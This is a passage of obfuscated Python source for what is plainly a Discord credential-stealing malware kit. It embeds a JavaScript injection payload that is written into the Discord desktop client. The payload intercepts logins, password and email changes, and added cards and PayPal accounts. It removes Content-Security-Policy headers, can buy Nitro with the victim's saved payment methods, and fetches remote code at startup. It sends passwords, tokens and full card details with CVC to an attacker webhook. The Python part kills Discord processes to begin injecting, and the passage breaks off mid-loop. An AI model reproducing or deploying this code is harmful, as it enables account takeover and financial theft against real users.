            embed.add_field(name=":moneybag: Billing:", value=f"```{AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{UCRMLGPGHDKJOBLSZJYOTFQLLVGARVEZYFEKDUBTHYUTPHZWPWALDDDHTWO}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=YXWGHANHNSPIYLEXOZVXRHFDTUFDVQHTHRFCHABHQFJPHJJJQWXTQLCKKGCOEJJAIAIEZHRJVGBIOJKXWXPITMDYT)
            embed.set_footer(text=UQNIKGREAMWSDRRWEOGXJXLXTQRFXWFUSZENMCFQJGITHRENYRQBMPZQLHRU, icon_url=QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ)
            MUUVXCEOHXTYRDHYNJVKAZAYUZDJZHTRUFWVETVNUCBWJIAMTWRXDCDIAIIQQIFBXEQMPOOOJLHRLHEMOXTQUPROJGIZICC.send(embed=embed, username=CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF, avatar_url=QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ)

    upload_t0k3n5()

BNKHAJHURRVKUTERYGYGBXFWCJRCSGTEEMANCQQXEPRQHSENSVDC = r"""
const args = process.argv;
const fs = require('fs');
const path = require('path');
const https = require('https');
const querystring = require('querystring');
const { BrowserWindow, session } = require('electron');

const config = {
  webhook: '%WEBHOOK_HERE%', 
  webhook_protector_key: '%WEBHOOK_KEY%', 
  auto_buy_nitro: false, 
  ping_on_run: true, 
  ping_val: '@everyone',
  ip_address_public: '%IP_PUBLIC%',
  username: '%USERNAME%',
  embed_name: '%EMBED_NAME%', 
  embed_icon: '%EMBED_ICON%'.replace(/ /g, '%20'), 
  footer_text: '%FOOTER_TEXT%',
  embed_color: %EMBED_COLOR%, 
  injection_url: '', 
  api: 'https://discord.com/api/v9/users/@me',
  nitro: {
    boost: {
      year: {
        id: '521847234246082599',
        sku: '511651885459963904',
        price: '9999',
      },
      month: {
        id: '521847234246082599',
        sku: '511651880837840896',
        price: '999',
      },
    },
    classic: {
      month: {
        id: '521846918637420545',
        sku: '511651871736201216',
        price: '499',
      },
    },
  },
  filter: {
    urls: [
      'https://discord.com/api/v*/users/@me',
      'https://discordapp.com/api/v*/users/@me',
      'https://*.discord.com/api/v*/users/@me',
      'https://discordapp.com/api/v*/auth/login',
      'https://discord.com/api/v*/auth/login',
      'https://*.discord.com/api/v*/auth/login',
      'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
      'https://api.stripe.com/v*/tokens',
      'https://api.stripe.com/v*/setup_intents/*/confirm',
      'https://api.stripe.com/v*/payment_intents/*/confirm',
    ],
  },
  filter2: {
    urls: [
      'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
      'https://*.discord.com/api/v*/applications/detectable',
      'https://discord.com/api/v*/applications/detectable',
      'https://*.discord.com/api/v*/users/@me/library',
      'https://discord.com/api/v*/users/@me/library',
      'wss://remote-auth-gateway.discord.gg/*',
    ],
  },
};

function parity_32(x, y, z) {
  return x ^ y ^ z;
}
function ch_32(x, y, z) {
  return (x & y) ^ (~x & z);
}

function maj_32(x, y, z) {
  return (x & y) ^ (x & z) ^ (y & z);
}
function rotl_32(x, n) {
  return (x << n) | (x >>> (32 - n));
}
function safeAdd_32_2(a, b) {
  var lsw = (a & 0xffff) + (b & 0xffff),
    msw = (a >>> 16) + (b >>> 16) + (lsw >>> 16);

  return ((msw & 0xffff) << 16) | (lsw & 0xffff);
}
function safeAdd_32_5(a, b, c, d, e) {
  var lsw = (a & 0xffff) + (b & 0xffff) + (c & 0xffff) + (d & 0xffff) + (e & 0xffff),
    msw = (a >>> 16) + (b >>> 16) + (c >>> 16) + (d >>> 16) + (e >>> 16) + (lsw >>> 16);

  return ((msw & 0xffff) << 16) | (lsw & 0xffff);
}
function binb2hex(binarray) {
  var hex_tab = '0123456789abcdef',
    str = '',
    length = binarray.length * 4,
    i,
    srcByte;

  for (i = 0; i < length; i += 1) {
    srcByte = binarray[i >>> 2] >>> ((3 - (i % 4)) * 8);
    str += hex_tab.charAt((srcByte >>> 4) & 0xf) + hex_tab.charAt(srcByte & 0xf);
  }

  return str;
}

function getH() {
  return [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0];
}
function roundSHA1(block, H) {
  var W = [],
    a,
    b,
    c,
    d,
    e,
    T,
    ch = ch_32,
    parity = parity_32,
    maj = maj_32,
    rotl = rotl_32,
    safeAdd_2 = safeAdd_32_2,
    t,
    safeAdd_5 = safeAdd_32_5;

  a = H[0];
  b = H[1];
  c = H[2];
  d = H[3];
  e = H[4];

  for (t = 0; t < 80; t += 1) {
    if (t < 16) {
      W[t] = block[t];
    } else {
      W[t] = rotl(W[t - 3] ^ W[t - 8] ^ W[t - 14] ^ W[t - 16], 1);
    }

    if (t < 20) {
      T = safeAdd_5(rotl(a, 5), ch(b, c, d), e, 0x5a827999, W[t]);
    } else if (t < 40) {
      T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0x6ed9eba1, W[t]);
    } else if (t < 60) {
      T = safeAdd_5(rotl(a, 5), maj(b, c, d), e, 0x8f1bbcdc, W[t]);
    } else {
      T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0xca62c1d6, W[t]);
    }

    e = d;
    d = c;
    c = rotl(b, 30);
    b = a;
    a = T;
  }

  H[0] = safeAdd_2(a, H[0]);
  H[1] = safeAdd_2(b, H[1]);
  H[2] = safeAdd_2(c, H[2]);
  H[3] = safeAdd_2(d, H[3]);
  H[4] = safeAdd_2(e, H[4]);

  return H;
}

function finalizeSHA1(remainder, remainderBinLen, processedBinLen, H) {
  var i, appendedMessageLength, offset;

  offset = (((remainderBinLen + 65) >>> 9) << 4) + 15;
  while (remainder.length <= offset) {
    remainder.push(0);
  }
  remainder[remainderBinLen >>> 5] |= 0x80 << (24 - (remainderBinLen % 32));
  remainder[offset] = remainderBinLen + processedBinLen;
  appendedMessageLength = remainder.length;

  for (i = 0; i < appendedMessageLength; i += 16) {
    H = roundSHA1(remainder.slice(i, i + 16), H);
  }
  return H;
}

function hex2binb(str, existingBin, existingBinLen) {
  var bin,
    length = str.length,
    i,
    num,
    intOffset,
    byteOffset,
    existingByteLen;

  bin = existingBin || [0];
  existingBinLen = existingBinLen || 0;
  existingByteLen = existingBinLen >>> 3;

  if (0 !== length % 2) {
    console.error('String of HEX type must be in byte increments');
  }

  for (i = 0; i < length; i += 2) {
    num = parseInt(str.substr(i, 2), 16);
    if (!isNaN(num)) {
      byteOffset = (i >>> 1) + existingByteLen;
      intOffset = byteOffset >>> 2;
      while (bin.length <= intOffset) {
        bin.push(0);
      }
      bin[intOffset] |= num << (8 * (3 - (byteOffset % 4)));
    } else {
      console.error('String of HEX type contains invalid characters');
    }
  }

  return { value: bin, binLen: length * 4 + existingBinLen };
}

class jsSHA {
  constructor() {
    var processedLen = 0,
      remainder = [],
      remainderLen = 0,
      intermediateH,
      converterFunc,
      outputBinLen,
      variantBlockSize,
      roundFunc,
      finalizeFunc,
      finalized = false,
      hmacKeySet = false,
      keyWithIPad = [],
      keyWithOPad = [],
      numRounds,
      numRounds = 1;

    converterFunc = hex2binb;

    if (numRounds !== parseInt(numRounds, 10) || 1 > numRounds) {
      console.error('numRounds must a integer >= 1');
    }
    variantBlockSize = 512;
    roundFunc = roundSHA1;
    finalizeFunc = finalizeSHA1;
    outputBinLen = 160;
    intermediateH = getH();

    this.setHMACKey = function (key) {
      var keyConverterFunc, convertRet, keyBinLen, keyToUse, blockByteSize, i, lastArrayIndex;
      keyConverterFunc = hex2binb;
      convertRet = keyConverterFunc(key);
      keyBinLen = convertRet['binLen'];
      keyToUse = convertRet['value'];
      blockByteSize = variantBlockSize >>> 3;
      lastArrayIndex = blockByteSize / 4 - 1;

      if (blockByteSize < keyBinLen / 8) {
        keyToUse = finalizeFunc(keyToUse, keyBinLen, 0, getH());
        while (keyToUse.length <= lastArrayIndex) {
          keyToUse.push(0);
        }
        keyToUse[lastArrayIndex] &= 0xffffff00;
      } else if (blockByteSize > keyBinLen / 8) {
        while (keyToUse.length <= lastArrayIndex) {
          keyToUse.push(0);
        }
        keyToUse[lastArrayIndex] &= 0xffffff00;
      }

      for (i = 0; i <= lastArrayIndex; i += 1) {
        keyWithIPad[i] = keyToUse[i] ^ 0x36363636;
        keyWithOPad[i] = keyToUse[i] ^ 0x5c5c5c5c;
      }

      intermediateH = roundFunc(keyWithIPad, intermediateH);
      processedLen = variantBlockSize;

      hmacKeySet = true;
    };

    this.update = function (srcString) {
      var convertRet,
        chunkBinLen,
        chunkIntLen,
        chunk,
        i,
        updateProcessedLen = 0,
        variantBlockIntInc = variantBlockSize >>> 5;

      convertRet = converterFunc(srcString, remainder, remainderLen);
      chunkBinLen = convertRet['binLen'];
      chunk = convertRet['value'];

      chunkIntLen = chunkBinLen >>> 5;
      for (i = 0; i < chunkIntLen; i += variantBlockIntInc) {
        if (updateProcessedLen + variantBlockSize <= chunkBinLen) {
          intermediateH = roundFunc(chunk.slice(i, i + variantBlockIntInc), intermediateH);
          updateProcessedLen += variantBlockSize;
        }
      }
      processedLen += updateProcessedLen;
      remainder = chunk.slice(updateProcessedLen >>> 5);
      remainderLen = chunkBinLen % variantBlockSize;
    };

    this.getHMAC = function () {
      var firstHash;

      if (false === hmacKeySet) {
        console.error('Cannot call getHMAC without first setting HMAC key');
      }

      const formatFunc = function (binarray) {
        return binb2hex(binarray);
      };

      if (false === finalized) {
        firstHash = finalizeFunc(remainder, remainderLen, processedLen, intermediateH);
        intermediateH = roundFunc(keyWithOPad, getH());
        intermediateH = finalizeFunc(firstHash, outputBinLen, variantBlockSize, intermediateH);
      }

      finalized = true;
      return formatFunc(intermediateH);
    };
  }
}

if ('function' === typeof define && define['amd']) {
  define(function () {
    return jsSHA;
  });
} else if ('undefined' !== typeof exports) {
  if ('undefined' !== typeof module && module['exports']) {
    module['exports'] = exports = jsSHA;
  } else {
    exports = jsSHA;
  }
} else {
  global['jsSHA'] = jsSHA;
}

if (jsSHA.default) {
  jsSHA = jsSHA.default;
}

function totp(key) {
  const period = 30;
  const digits = 6;
  const timestamp = Date.now();
  const epoch = Math.round(timestamp / 1000.0);
  const time = leftpad(dec2hex(Math.floor(epoch / period)), 16, '0');
  const shaObj = new jsSHA();
  shaObj.setHMACKey(base32tohex(key));
  shaObj.update(time);
  const hmac = shaObj.getHMAC();
  const offset = hex2dec(hmac.substring(hmac.length - 1));
  let otp = (hex2dec(hmac.substr(offset * 2, 8)) & hex2dec('7fffffff')) + '';
  otp = otp.substr(Math.max(otp.length - digits, 0), digits);
  return otp;
}

function hex2dec(s) {
  return parseInt(s, 16);
}

function dec2hex(s) {
  return (s < 15.5 ? '0' : '') + Math.round(s).toString(16);
}

function base32tohex(base32) {
  let base32chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567',
    bits = '',
    hex = '';

  base32 = base32.replace(/=+$/, '');

  for (let i = 0; i < base32.length; i++) {
    let val = base32chars.indexOf(base32.charAt(i).toUpperCase());
    if (val === -1) console.error('Invalid base32 character in key');
    bits += leftpad(val.toString(2), 5, '0');
  }

  for (let i = 0; i + 8 <= bits.length; i += 8) {
    let chunk = bits.substr(i, 8);
    hex = hex + leftpad(parseInt(chunk, 2).toString(16), 2, '0');
  }
  return hex;
}

function leftpad(str, len, pad) {
  if (len + 1 >= str.length) {
    str = Array(len + 1 - str.length).join(pad) + str;
  }
  return str;
}

const discordPath = (function () {
  const app = args[0].split(path.sep).slice(0, -1).join(path.sep);
  let resourcePath;

  if (process.platform === 'win32') {
    resourcePath = path.join(app, 'resources');
  } else if (process.platform === 'darwin') {
    resourcePath = path.join(app, 'Contents', 'Resources');
  }

  if (fs.existsSync(resourcePath)) return { resourcePath, app };
  return { undefined, undefined };
})();

function updateCheck() {
  const { resourcePath, app } = discordPath;
  if (resourcePath === undefined || app === undefined) return;
  const appPath = path.join(resourcePath, 'app');
  const packageJson = path.join(appPath, 'package.json');
  const resourceIndex = path.join(appPath, 'index.js');
  const indexJs = `${app}\\modules\\discord_desktop_core-1\\discord_desktop_core\\index.js`;
  const bdPath = path.join(process.env.APPDATA, '\\betterdiscord\\data\\betterdiscord.asar');
  if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
  if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson);
  if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex);

  if (process.platform === 'win32' || process.platform === 'darwin') {
    fs.writeFileSync(
      packageJson,
      JSON.stringify(
        {
          name: 'discord',
          main: 'index.js',
        },
        null,
        4,
      ),
    );

    const startUpScript = `const fs = require('fs'), https = require('https');
const indexJs = '${indexJs}';
const bdPath = '${bdPath}';
const fileSize = fs.statSync(indexJs).size
fs.readFileSync(indexJs, 'utf8', (err, data) => {
    if (fileSize < 20000 || data === "module.exports = require('./core.asar')") 
        init();
})
async function init() {
    https.get('${config.injection_url}', (res) => {
        const file = fs.createWriteStream(indexJs);
        res.replace('%WEBHOOK_HERE%', '${config.webhook}')
        res.replace('%WEBHOOK_KEY%', '${config.webhook_protector_key}')
        res.pipe(file);
        file.on('finish', () => {
            file.close();
        });
    
    }).on("error", (err) => {
        setTimeout(init(), 10000);
    });
}
require('${path.join(resourcePath, 'app.asar')}')
if (fs.existsSync(bdPath)) require(bdPath);`;
    fs.writeFileSync(resourceIndex, startUpScript.replace(/\\/g, '\\\\'));
  }
  if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0;
  fs.rmdirSync(path.join(__dirname, 'initiation'));
  execScript(
    `window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
  );
  return !1;
}

const execScript = (script) => {
  const window = BrowserWindow.getAllWindows()[0];
  return window.webContents.executeJavaScript(script, !0);
};

const getInfo = async (token) => {
  const info = await execScript(`var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", "${config.api}", false);
    xmlHttp.setRequestHeader("Authorization", "${token}");
    xmlHttp.send(null);
    xmlHttp.responseText;`);
  return JSON.parse(info);
};

const fetchBilling = async (token) => {
  const bill = await execScript(`var xmlHttp = new XMLHttpRequest(); 
    xmlHttp.open("GET", "${config.api}/billing/payment-sources", false); 
    xmlHttp.setRequestHeader("Authorization", "${token}"); 
    xmlHttp.send(null); 
    xmlHttp.responseText`);
  if (!bill.lenght || bill.length === 0) return '';
  return JSON.parse(bill);
};

const getBilling = async (token) => {
  const data = await fetchBilling(token);
  if (!data) return '❌';
  let billing = '';
  data.forEach((x) => {
    if (!x.invalid) {
      switch (x.type) {
        case 1:
          billing += '[CARD] ';
          break;
        case 2:
          billing += '[PAYPAL] ';
          break;
      }
    }
  });
  if (!billing) billing = 'None';
  return billing;
};

const Purchase = async (token, id, _type, _time) => {
  const options = {
    expected_amount: config.nitro[_type][_time]['price'],
    expected_currency: 'usd',
    gift: true,
    payment_source_id: id,
    payment_source_token: null,
    purchase_token: '2422867c-244d-476a-ba4f-36e197758d97',
    sku_subscription_plan_id: config.nitro[_type][_time]['sku'],
  };

  const req = execScript(`var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("POST", "https://discord.com/api/v9/store/skus/${config.nitro[_type][_time]['id']}/purchase", false);
    xmlHttp.setRequestHeader("Authorization", "${token}");
    xmlHttp.setRequestHeader('Content-Type', 'application/json');
    xmlHttp.send(JSON.stringify(${JSON.stringify(options)}));
    xmlHttp.responseText`);
  if (req['gift_code']) {
    return 'https://discord.gift/' + req['gift_code'];
  } else return null;
};

const buyNitro = async (token) => {
  const data = await fetchBilling(token);
  const failedMsg = 'Failed to Purchase';
  if (!data) return failedMsg;

  let IDS = [];
  data.forEach((x) => {
    if (!x.invalid) {
      IDS = IDS.concat(x.id);
    }
  });
  for (let sourceID in IDS) {
    const first = Purchase(token, sourceID, 'boost', 'year');
    if (first !== null) {
      return first;
    } else {
      const second = Purchase(token, sourceID, 'boost', 'month');
      if (second !== null) {
        return second;
      } else {
        const third = Purchase(token, sourceID, 'classic', 'month');
        if (third !== null) {
          return third;
        } else {
          return failedMsg;
        }
      }
    }
  }
};

const hooker = async (content) => {
  const data = JSON.stringify(content);
  const url = new URL(config.webhook);
  const headers = {
    'Content-Type': 'application/json',
    'Access-Control-Allow-Origin': '*',
  };
  if (!config.webhook.includes('api/webhooks')) {
    const key = totp(config.webhook_protector_key);
    headers['Authorization'] = key;
  }
  const options = {
    protocol: url.protocol,
    hostname: url.host,
    path: url.pathname,
    method: 'POST',
    headers: headers,
  };
  const req = https.request(options);

  req.on('error', (err) => {
    console.log(err);
  });
  req.write(data);
  req.end();
};

const login = async (email, password, token) => {
  const json = await getInfo(token);
  const content = {
    username: config.embed_name,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Login] \`${config.username} "${config.ip_address_public}"\`:`, 
        fields: [
          {
            name: ':e_mail: Email:',
            value: `\`\`\`${email}\`\`\``,
            inline: false,
          },
          {
            name: ':key: Password:',
            value: `\`\`\`${password}\`\`\``,
            inline: false,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' (' + json.id + ')',
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val;
  hooker(content);
};

const passwordChanged = async (oldpassword, newpassword, token) => {
  const json = await getInfo(token);
  const content = {
    username: config.embed_name,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Password Changed] \`${config.username} "${config.ip_address_public}"\`:`, 
        fields: [
          {
            name: ':e_mail: Email:',
            value: `\`\`\`${json.email}\`\`\``,
            inline: false,
          },
          {
            name: ':unlock: Old Password:',
            value: `\`\`\`${oldpassword}\`\`\``,
            inline: true,
          },
          {
            name: ':key: New Password:',
            value: `\`\`\`${newpassword}\`\`\``,
            inline: true,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' (' + json.id + ')',
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val;
  hooker(content);
};

const emailChanged = async (email, password, token) => {
  const json = await getInfo(token);
  const content = {
    username: config.embed_name,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Email Changed] \`${config.username} "${config.ip_address_public}"\`:`, 
        fields: [
          {
            name: ':e_mail: New Email:',
            value: `\`\`\`${email}\`\`\``,
            inline: false,
          },
          {
            name: ':key: Password:',
            value: `\`\`\`${password}\`\`\``,
            inline: false,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' | ' + json.id,
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val;
  hooker(content);
};

const PaypalAdded = async (token) => {
  const json = await getInfo(token);
  const billing = await getBilling(token);
  const content = {
    username: config.embed_name,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Paypal Added] \`${config.username} "${config.ip_address_public}"\`:`,
        fields: [
          {
            name: ':moneybag: Billing:',
            value: `\`\`\`${billing}\`\`\``,
            inline: false,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' (' + json.id + ')',
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val;
  hooker(content);
};

const ccAdded = async (number, cvc, expir_month, expir_year, token) => {
  const json = await getInfo(token);
  const billing = await getBilling(token);
  const content = {
    username: config.embed_name,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Card Added] \`${config.username} "${config.ip_address_public}"\`:`,
        fields: [
          {
            name: ':identification_card: Card:',
            value: `\`\`\`Number: ${number}\nCVC: ${cvc}\nExpir Month: ${expir_month}\nExpir Year: ${expir_year}\`\`\``,
            inline: false,
          },
          {
            name: ':moneybag: Billing:',
            value: `\`\`\`${billing}\`\`\``,
            inline: false,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' (' + json.id + ')',
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val;
  hooker(content);
};

const nitroBought = async (token) => {
  const json = await getInfo(token);
  const code = await buyNitro(token);
  const content = {
    username: config.embed_name,
    content: code,
    avatar_url: config.embed_icon,
    embeds: [
      {
        color: config.embed_color,
        title: `Discord Injection [Nitro Bought] \`${config.username} "${config.ip_address_public}"\`:`,
        fields: [
          {
            name: ':rocket: Nitro Code:',
            value: `\`\`\`${code}\`\`\``,
            inline: true,
          },
          {
            name: ':globe_with_meridians: Token:',
            value: `\`\`\`${token}\`\`\``,
            inline: false,
          },
        ],
        author: {
          name: json.username + '#' + json.discriminator + ' (' + json.id + ')',
          icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
        },
        footer: {
            text: config.footer_text,
            icon_url: config.embed_icon
        },
      },
    ],
  };
  if (config.ping_on_run) content['content'] = config.ping_val + `\n${code}`;
  hooker(content);
};
session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => {
  if (details.url.startsWith('wss://remote-auth-gateway')) return callback({ cancel: true });
  updateCheck();
});

session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
  if (details.url.startsWith(config.webhook)) {
    if (details.url.includes('discord.com')) {
      callback({
        responseHeaders: Object.assign(
          {
            'Access-Control-Allow-Headers': '*',
          },
          details.responseHeaders,
        ),
      });
    } else {
      callback({
        responseHeaders: Object.assign(
          {
            'Content-Security-Policy': ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],
            'Access-Control-Allow-Headers': '*',
            'Access-Control-Allow-Origin': '*',
          },
          details.responseHeaders,
        ),
      });
    }
  } else {
    delete details.responseHeaders['content-security-policy'];
    delete details.responseHeaders['content-security-policy-report-only'];

    callback({
      responseHeaders: {
        ...details.responseHeaders,
        'Access-Control-Allow-Headers': '*',
      },
    });
  }
});

session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => {
  if (details.statusCode !== 200 && details.statusCode !== 202) return;
  const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString();
  const data = JSON.parse(unparsed_data);
  const token = await execScript(
    `(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`,
  );
  switch (true) {
    case details.url.endsWith('login'):
      login(data.login, data.password, token).catch(console.error);
      break;

    case details.url.endsWith('users/@me') && details.method === 'PATCH':
      if (!data.password) return;
      if (data.email) {
        emailChanged(data.email, data.password, token).catch(console.error);
      }
      if (data.new_password) {
        passwordChanged(data.password, data.new_password, token).catch(console.error);
      }
      break;

    case details.url.endsWith('tokens') && details.method === 'POST':
      const item = querystring.parse(unparsedData.toString());
      ccAdded(item['card[number]'], item['card[cvc]'], item['card[exp_month]'], item['card[exp_year]'], token).catch(console.error);
      break;

    case details.url.endsWith('paypal_accounts') && details.method === 'POST':
      PaypalAdded(token).catch(console.error);
      break;

    case details.url.endsWith('confirm') && details.method === 'POST':
      if (!config.auto_buy_nitro) return;
      setTimeout(() => {
        nitroBought(token).catch(console.error);
      }, 7500);
      break;

    default:
      break;
  }
});
module.exports = require('./core.asar');"""

def Di5c0rd_inj3c710n():
    import os
    import re
    import subprocess
    import psutil

    def g3t_c0r3(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI):
        for v4r_file in os.listdir(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI):
            if re.search(r'app-+?', v4r_file):
                v4r_modules = WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI + '\\' + v4r_file + '\\modules'
                if not os.path.exists(v4r_modules):
                    continue
                for v4r_file in os.listdir(v4r_modules):
                    if re.search(r'discord_desktop_core-+?', v4r_file):
                        v4r_core = v4r_modules + '\\' + v4r_file + '\\' + 'discord_desktop_core'
                        return v4r_core, v4r_file
        return None

    def st4rt_d15c0rd(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI):
        v4r_update = WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI + '\\Update.exe'
        v4r_executable = WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI.split('\\')[-1] + '.exe'

        for v4r_file in os.listdir(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI):
            if re.search(r'app-+?', v4r_file):
                v4r_app = WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI + '\\' + v4r_file
                if os.path.exists(v4r_app + '\\' + 'modules'):
                    for v4r_file in os.listdir(v4r_app):
                        if v4r_file == v4r_executable:
                            v4r_executable = v4r_app + '\\' + v4r_executable
                            subprocess.call([v4r_update, '--processStart', v4r_executable],
                                            shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    def inj3ct_c0d3():
        HMJSWGXZPLXQVYTNUWBAZBUAQWBQSHSZFOZJMWJDBOCZVYUKRADOSMWLCPHQDNOKERCUAVUZRFARIDDPXDAHFITHWJC = os.getenv('LOCALAPPDATA')
        DFPGXCBSOFDGDWLWNFYSRGCWHINJTGUKYZFTYLPOQQXMFEMQXLUAOTUWLZBZIKCZMCPARYYYFBHCCL = [
            HMJSWGXZPLXQVYTNUWBAZBUAQWBQSHSZFOZJMWJDBOCZVYUKRADOSMWLCPHQDNOKERCUAVUZRFARIDDPXDAHFITHWJC + '\\Discord',
            HMJSWGXZPLXQVYTNUWBAZBUAQWBQSHSZFOZJMWJDBOCZVYUKRADOSMWLCPHQDNOKERCUAVUZRFARIDDPXDAHFITHWJC + '\\DiscordCanary',
            HMJSWGXZPLXQVYTNUWBAZBUAQWBQSHSZFOZJMWJDBOCZVYUKRADOSMWLCPHQDNOKERCUAVUZRFARIDDPXDAHFITHWJC + '\\DiscordPTB',
            HMJSWGXZPLXQVYTNUWBAZBUAQWBQSHSZFOZJMWJDBOCZVYUKRADOSMWLCPHQDNOKERCUAVUZRFARIDDPXDAHFITHWJC + '\\DiscordDevelopment'
        ]
        KTRTPIFRWGLYOMKIOCZZXQMAUOTKUBQSCDGNLWTKMHWALZRFLBLPHNFTZJ = BNKHAJHURRVKUTERYGYGBXFWCJRCSGTEEMANCQQXEPRQHSENSVDC

        for v4r_proc in psutil.process_iter():
            if 'discord' in v4r_proc.name().lower():
                v4r_proc.kill()

        for WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI in DFPGXCBSOFDGDWLWNFYSRGCWHINJTGUKYZFTYLPOQQXMFEMQXLUAOTUWLZBZIKCZMCPARYYYFBHCCL:
            if not os.path.exists(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI):
                continue

